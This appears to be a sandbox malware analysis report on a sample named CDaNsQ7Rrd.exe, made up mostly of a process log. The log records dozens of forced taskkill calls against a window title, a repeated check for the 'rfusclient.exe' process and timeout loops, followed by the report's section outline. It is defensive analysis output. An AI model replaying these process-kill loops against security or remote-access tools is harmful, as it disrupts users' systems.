Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2416 Parent PID: 2948

General

Start time:	10:36:02
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2248 Parent PID: 2948

General

Start time:	10:36:03
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2956 Parent PID: 2948

General

Start time:	10:36:04
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3740 Parent PID: 2948

General

Start time:	10:36:05
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2408 Parent PID: 2948

General

Start time:	10:36:05
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2908 Parent PID: 2948

General

Start time:	10:36:05
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2896 Parent PID: 2948

General

Start time:	10:36:06
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 2112 Parent PID: 1032

General

Start time:	10:36:06
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 3084 Parent PID: 1032

General

Start time:	10:36:06
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3800 Parent PID: 2948

General

Start time:	10:36:07
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2336 Parent PID: 2948

General

Start time:	10:36:08
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2040 Parent PID: 2948

General

Start time:	10:36:09
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1576 Parent PID: 2948

General

Start time:	10:36:09
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1536 Parent PID: 2948

General

Start time:	10:36:09
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 2656 Parent PID: 1032

General

Start time:	10:36:10
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):
Commandline:	timeout 3 /nobreak
Imagebase:
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3280 Parent PID: 2948

General

Start time:	10:36:10
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3268 Parent PID: 2948

General

Start time:	10:36:11
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1164 Parent PID: 2948

General

Start time:	10:36:11
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3304 Parent PID: 2948

General

Start time:	10:36:11
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3312 Parent PID: 2948

General

Start time:	10:36:12
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1888 Parent PID: 2948

General

Start time:	10:36:12
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3436 Parent PID: 2948

General

Start time:	10:36:13
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 3236 Parent PID: 1032

General

Start time:	10:36:13
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 3592 Parent PID: 1032

General

Start time:	10:36:13
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3216 Parent PID: 2948

General

Start time:	10:36:14
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 644 Parent PID: 2948

General

Start time:	10:36:14
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x310000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3256 Parent PID: 2948

General

Start time:	10:36:15
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3760 Parent PID: 2948

General

Start time:	10:36:15
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3404 Parent PID: 2948

General

Start time:	10:36:16
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 1920 Parent PID: 1032

General

Start time:	10:36:16
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):
Commandline:	timeout 3 /nobreak
Imagebase:
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3768 Parent PID: 2948

General

Start time:	10:36:16
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3836 Parent PID: 2948

General

Start time:	10:36:17
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3508 Parent PID: 2948

General

Start time:	10:36:17
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2516 Parent PID: 2948

General

Start time:	10:36:18
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3108 Parent PID: 2948

General

Start time:	10:36:18
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 3668 Parent PID: 1032

General

Start time:	10:36:19
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3864 Parent PID: 2948

General

Start time:	10:36:19
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 412 Parent PID: 1032

General

Start time:	10:36:20
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2284 Parent PID: 2948

General

Start time:	10:36:20
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3896 Parent PID: 2948

General

Start time:	10:36:21
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3484 Parent PID: 2948

General

Start time:	10:36:21
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 188 Parent PID: 2948

General

Start time:	10:36:21
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 2192 Parent PID: 1032

General

Start time:	10:36:22
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):
Commandline:	timeout 3 /nobreak
Imagebase:
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1908 Parent PID: 2948

General

Start time:	10:36:22
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 244 Parent PID: 2948

General

Start time:	10:36:23
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 256 Parent PID: 2948

General

Start time:	10:36:23
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report CDaNsQ7Rrd.exe

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Spreading:

Networking:

DDoS:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations